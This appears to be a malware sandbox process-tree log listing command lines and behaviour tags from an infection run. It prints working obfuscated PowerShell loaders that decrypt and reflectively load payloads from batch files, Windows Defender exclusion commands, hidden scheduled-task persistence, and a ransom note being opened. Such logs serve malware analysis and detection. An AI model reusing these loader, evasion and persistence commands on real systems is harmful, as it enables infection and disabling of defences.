"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_989_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_989.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_989.vbs"
6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_989.bat" "
7⤵
- Suspicious use of WriteProcessMemory
PID:2524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FVNBAV5hCFFpcmokEXdLKpKeNrzjcRlF7S4OiloR0nw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('thF/c6lNRygw0iOWz/3f3Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GUIcX=New-Object System.IO.MemoryStream(,$param_var); $kzKxd=New-Object System.IO.MemoryStream; $aONIx=New-Object System.IO.Compression.GZipStream($GUIcX, [IO.Compression.CompressionMode]::Decompress); $aONIx.CopyTo($kzKxd); $aONIx.Dispose(); $GUIcX.Dispose(); $kzKxd.Dispose(); $kzKxd.ToArray();}function execute_function($param_var,$param2_var){ $xtOzb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Cxrvl=$xtOzb.EntryPoint; $Cxrvl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_989.bat';$jNKhC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_989.bat').Split([Environment]::NewLine);foreach ($CXuui in $jNKhC) { if ($CXuui.StartsWith(':: ')) { $uBozz=$CXuui.Substring(3); break; }}$payloads_var=[string[]]$uBozz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4816

C:\Users\Admin\AppData\Local\Temp\RobloxPlayerInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\RobloxPlayerInstaller.exe"
9⤵
- Executes dropped EXE
PID:4564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4404

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\System.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
PID:4544

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\System.exe"
9⤵
- Creates scheduled task(s)
PID:2408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\System.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('111rOpL8xaiyQ2GEd0p85Kvi24ierrvXzW0ME70UEl0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T4Nwqw9t3OSdmcpvYHb7sQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aPTjF=New-Object System.IO.MemoryStream(,$param_var); $YuTQt=New-Object System.IO.MemoryStream; $fXCFx=New-Object System.IO.Compression.GZipStream($aPTjF, [IO.Compression.CompressionMode]::Decompress); $fXCFx.CopyTo($YuTQt); $fXCFx.Dispose(); $aPTjF.Dispose(); $YuTQt.Dispose(); $YuTQt.ToArray();}function execute_function($param_var,$param2_var){ $kPYWO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KCrWw=$kPYWO.EntryPoint; $KCrWw.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Windows\System.bat';$lUuap=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Windows\System.bat').Split([Environment]::NewLine);foreach ($urGxa in $lUuap) { if ($urGxa.StartsWith(':: ')) { $eciCH=$urGxa.Substring(3); break; }}$payloads_var=[string[]]$eciCH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_972_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_972.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_972.vbs"
6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_972.bat" "
7⤵
PID:2704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('111rOpL8xaiyQ2GEd0p85Kvi24ierrvXzW0ME70UEl0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T4Nwqw9t3OSdmcpvYHb7sQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aPTjF=New-Object System.IO.MemoryStream(,$param_var); $YuTQt=New-Object System.IO.MemoryStream; $fXCFx=New-Object System.IO.Compression.GZipStream($aPTjF, [IO.Compression.CompressionMode]::Decompress); $fXCFx.CopyTo($YuTQt); $fXCFx.Dispose(); $aPTjF.Dispose(); $YuTQt.Dispose(); $YuTQt.ToArray();}function execute_function($param_var,$param2_var){ $kPYWO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KCrWw=$kPYWO.EntryPoint; $KCrWw.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_972.bat';$lUuap=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_972.bat').Split([Environment]::NewLine);foreach ($urGxa in $lUuap) { if ($urGxa.StartsWith(':: ')) { $eciCH=$urGxa.Substring(3); break; }}$payloads_var=[string[]]$eciCH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1324

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\System.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:752

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\System.exe"
9⤵
- Creates scheduled task(s)
PID:4448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\Using_System.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kAzFiLh2ckd9077NF/wg66jLYLWgKaZxGGtCSzUb268='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KYXNNW9+J4MyQ0oRf9tPSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zzZub=New-Object System.IO.MemoryStream(,$param_var); $PbxQm=New-Object System.IO.MemoryStream; $HoMLo=New-Object System.IO.Compression.GZipStream($zzZub, [IO.Compression.CompressionMode]::Decompress); $HoMLo.CopyTo($PbxQm); $HoMLo.Dispose(); $zzZub.Dispose(); $PbxQm.Dispose(); $PbxQm.ToArray();}function execute_function($param_var,$param2_var){ $nfILg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QCeRG=$nfILg.EntryPoint; $QCeRG.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Windows\Using_System.bat';$oTtMo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Windows\Using_System.bat').Split([Environment]::NewLine);foreach ($JmpkX in $oTtMo) { if ($JmpkX.StartsWith(':: ')) { $vWvTa=$JmpkX.Substring(3); break; }}$payloads_var=[string[]]$vWvTa.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_704_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_704.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_704.vbs"
6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_704.bat" "
7⤵
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kAzFiLh2ckd9077NF/wg66jLYLWgKaZxGGtCSzUb268='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KYXNNW9+J4MyQ0oRf9tPSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zzZub=New-Object System.IO.MemoryStream(,$param_var); $PbxQm=New-Object System.IO.MemoryStream; $HoMLo=New-Object System.IO.Compression.GZipStream($zzZub, [IO.Compression.CompressionMode]::Decompress); $HoMLo.CopyTo($PbxQm); $HoMLo.Dispose(); $zzZub.Dispose(); $PbxQm.Dispose(); $PbxQm.ToArray();}function execute_function($param_var,$param2_var){ $nfILg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QCeRG=$nfILg.EntryPoint; $QCeRG.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_704.bat';$oTtMo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_704.bat').Split([Environment]::NewLine);foreach ($JmpkX in $oTtMo) { if ($JmpkX.StartsWith(':: ')) { $vWvTa=$JmpkX.Substring(3); break; }}$payloads_var=[string[]]$vWvTa.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3644

C:\Users\Admin\AppData\Local\Temp\Using System.exe
"C:\Users\Admin\AppData\Local\Temp\Using System.exe"
9⤵
- Executes dropped EXE
PID:1704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\System.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1144

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Local\Temp\System.exe"
9⤵
- Creates scheduled task(s)
PID:2276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
9⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd603e46f8,0x7ffd603e4708,0x7ffd603e4718
10⤵
PID:2464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
10⤵
PID:5168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
10⤵
PID:5176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
10⤵
PID:5192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
10⤵
PID:5376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
10⤵
PID:5384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1712 /prefetch:1
10⤵
PID:4924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
10⤵
PID:1896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
10⤵
PID:4964

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
10⤵
PID:3520

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
10⤵
PID:5292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2992 /prefetch:1
10⤵
PID:4012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
10⤵
PID:1232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1720 /prefetch:1
10⤵
PID:5472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
10⤵
PID:1704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
10⤵
PID:1444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,3213428511552155611,3492693581146350582,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4812 /prefetch:2
10⤵
PID:560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
